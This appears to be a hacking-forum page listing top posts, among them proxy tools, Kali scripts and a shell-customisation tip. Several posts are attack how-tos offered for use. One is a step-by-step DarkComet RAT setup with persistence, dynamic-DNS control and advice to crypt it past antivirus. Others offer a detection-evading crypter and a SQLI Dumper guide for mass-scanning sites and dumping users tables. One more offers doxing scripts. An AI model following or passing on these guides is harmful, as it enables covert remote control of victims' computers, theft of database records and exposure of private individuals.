    Proxy Buddy Download link : [Hidden Content] Proxy Buddy is the most powerful multi-threaded software for finding, testing and getting more information about your proxies. Do not waist your time anymore, Proxy Buddy can do everything on autopilot. Features: Scrape Proxies (supports regular expressions) [the best source for fresh proxies are include!] Test Proxies (against Google and IP) Get additional information about the Proxy (Google Pass, Country, Connection Time, Anonymity and supported Protocols) Filter Proxy List Export Proxies (Clipboard, .TXT, .CSV) Upload Proxy List to FTP Server Send Proxy by Email AND THE BEST FOR LAST: You can schedule everything (e.g. you easily could send a newsletter with Google passed proxies everyday)
  15. 2 points
    Hello, I put here python scripts that allows you to generate dox reports (Personal, Company etc.). Download link : [Hidden Content]
  16. 2 points
    Hey @AdminSec i propose to move the section "recent post" into the top of the page. for when we connect to the page we see the recent post and like that we can follow what going on . I make a prototype of what that can look like: [Hidden Content]
  17. 2 points
    This script is commented so you can read the code and understand him : [Hidden Content] Leave a Like
  18. 2 points
    Here is 2 scripts that i write to make active the monitor mode + MACchanger : (for kali) [Hidden Content] give them the right with : chmod +x monitor_on.sh | monitor_off.sh or with : chmod +x monitor_on.sh && chmod +x monitor_off.sh leave a like if you like it
  19. 1 point
    Note: In this format, the RAT program will quite easily be detected by anti-virus software. In order to evade such detection you will have to crypto the DarkComet RAT. It must become undetectable in order to use stealthily. Or, the attacker might install such a program and add exceptions to the anti-virus. The newest versions are always the most stable. Let’s say you use DarkComet 3.2. DarkComet 3.2 will be quite old by the writing of this blog. The system functions may have changed. DarkCoderSc has updated it to DarkComet 5.3.2 with the latest functions, it’s like buying a can of Pepsi then finding it has gone-off. Here is the tutorial on how to setup DarkComet 5.3.1 Go to the DarkComet website ([Hidden Content]). I would not get this RAT from anywhere else, lest it be crawling with gremlins. At the top, you will see a list of items. Click Downloads. Next there will be a list of DarkComet-RAT product versions. Click the top one. When you click Download, you will see three boxes. Tick them. Click Download. Open the DarkComet RAR (You need WinRAR) It should look like this: Make a folder on your desktop. Name it anything you want. Drag the items from the WinRAR folder to the Tutorial folder at your Desktop. Now, everything should be there like this: Open DarkComet.exe (Run as Administrator) A TOS should show up. Tick the box saying ‘Do not display again the EULA‘ that is located at the bottom left. Click ‘I accept‘ At the bottom left, it will show up a Help Screen, tick ‘Do not show at startup‘ then click ‘Fine‘ Click DarkComet-RAT at the top left. Click ‘Listen to new port (+Listen)‘ A new window should open, put in your Port then tick ‘Try to forward automaticaly (UPNP)‘ IN this case, I will do port 70 so I put that in, tick ‘Try to forward automatically (UpNP)‘ and click Listen. Move over to ‘Socket / Net‘ located at the very end of the top left border. You should see something like this: 70 may not be your port, your port that you added in ‘Listen to new port‘ will be displayed, not specifically 70. Go to ‘www.canyouseeme.org‘ Put in the port that you are listened on. If all went well, it should look like this: Now, click DarkComet-RAT again and click Server Module, then click Full Editor (Expert) Name your Security Password anything you like, then click the Mutex a few times. We then have the Main Settings done. Make sure you untick FWB (Firewall Bypass) Go to Network Settings. Now, go to [Hidden Content] and register Click Free DNS Put in whatever you want for it. Make sure the email is valid because we will need it to validate. (if you don’t want to give your email, get a temp email at 10minutemail.com) Sign in now. Now, at the Body you will see a list of options, click ‘Add Host’ Copy the settings: Leave IP Address, as that will show as Default your IP address. Click Create Host. Go back to your DarkComet and put in the Ip/DNS and Port (DNS for the NO-IP you made a second ago and Port for the one you listened on!) Then click ‘Add‘ and go to Module Startup. Tick the ‘Start the stub with windows (module startup)’ Then leave everything but ‘Persistance installation ( always come back )‘ Tick that. Now, it should look like this: Now go to ‘Stub Finalization‘ at the end. If you are going to get it crypted then don’t tick UPX (Ultimate Packer Executable) but if you are, I would leave it off and just have it on No compression. Now tick the ‘Save the profile when stub succesfully generated’ and Build the Stub. Now there is one last thing. Go to the Client Settings in DarkComet-RAT and then Click NO-IP Updater Then put in the NO-IP host, Username and Password, then tick ‘Auto update your no-ip dns when your IP change‘ Now, run the stub that you generated in a Sandbox to test, and you should show up! Here now, we have run through the entire thorough setup for DarkComet. Even your kid brother could follow this tutorial. Now what you need to do is some research into how to encrypt the EXE, so it can be installed remotely without an antivirus putting up a fuss. I know Metasploit has some pretty good encryption in it’s framework. I would start there. Watch out for others telling you they will encrypt it for you. This is usually a trick to just pack their own RAT into your stuff!
  20. 1 point
    Download Link : [Hidden Content] Remember the crypter does not matter, the stub matters a lot Important: When i ran the crypted.exe i get an error on the first run, but works fine afterwards. It's a strange one.. Found this crypter on a forum from a year ago, was fully detected ofcourse, i modified the stub without any source-code to its 2/22 detection rate within an hour ezpz if you wanna learn how to do so yourself shoot me a PM. Remember to only scan @ spyralscanner.net
  21. 1 point
    Pseudo Knight4131` Age 49 Why did you come to this forum? You told me to on FB Group What do you think you learn on the forum? Don't know yet. Trying to figure out what it is... What do you think you give to the forum ? Lots of experience What's your best specialty? Pen-testing, IR, & Forensics Tell something about you I teach pen-testing, IR, and Forensics for fun and profit What do you want to do ? Teach Learn Train Write tutorials Rate the forum design Sponsor Guest
  22. 1 point
    Accept Read and understood
  23. 1 point
    Accepted Good suggest !
  24. 1 point
    ================================= Requirements ================================= ~ Have a brain ================================= What will be in this post ================================= ~ How to setup SQLI Dumper ~ How to make your own HQ dorks ~ How to use SQLI Dumper to inject sites ================================= Downloads ================================= SQLI Dumper [Hidden Content] ================================= SQLI Dumper ================================= -{Setting Up}- go to the Keygen folder and run the file Than copy the Key and run the SQLI dumper file and use the key -{Scanning}- Here is where you get to use the DORKS you made earlier go into the file that the dorks where generated in and copy them all Now open up the SQLI Dumper tool in the top left click "Online Scanner" Than under that click URL's Queue Now in the big text field in the top middle paste in all the Dorks Than go to the top right to "Start Scanner" To the left of that make sure that number is 10 Than click Start Scanner than "URL's Only" Under "Online Scanner" and above URL's Queue it will say Queue than a number That number is how many sites are possibly exploitable -{Exploitables}- Now after you have finished all the scanning hit cancel in bottom right And click on "Exploitables" to the right of "URL's Queue" In top right there is "Start Exploiter" to the right of that change that number to 30 Than click "Start Exploiter" and wait for that to finish Once it is at 100% you hit cancel -{Injectables}- Now click "Injectables" to the right of "Exploitables" And in top right there is "Start Analyzer" change that number to the left to 20 Than click "Start Analyzer" After that is done click cancel -{Data Dumper}- Now after you have some sites listed off in injectables you are ready to actually preform the attack Find the site you want to start to attack and right click on it and hit "New Dumper" or "Go to Dumper" Once in the Data Dumper click Get Databases on top of text field Inside the text field there should be at least one database click on that and hit "Get Tables" After all that loads in look for useful tables usually it will be named "users" Now click on whatever table you want to get the info out of and hit "Get Columns" Should list off a bunch of different info fields check the boxes next to the ones you want to export and hit "Dump Data" in top right of the text field Finally after that is done click Export Data click "Start"and save to where you want it If was helpful slap me a rating ?
  25. 1 point
    Hi, I will show you how to personalize you Linux terminal: Fish i'll show you "Fish" / More info [Hidden Content] How to install ? write : sudo apt-get update && sudo apt-get full-ugrade -Y sudo apt-get install fish then write "fish" to launch the fish interface. If you want to make him as "default" : write : cd ~ sudo gedit .bashrc OR #if you have leafpad sudo leafpad .bashrc then go to the end of the file and write "fish" like this: (then save the file) [Hidden Content] It will launch Fish instantly after you open the terminal Leave a like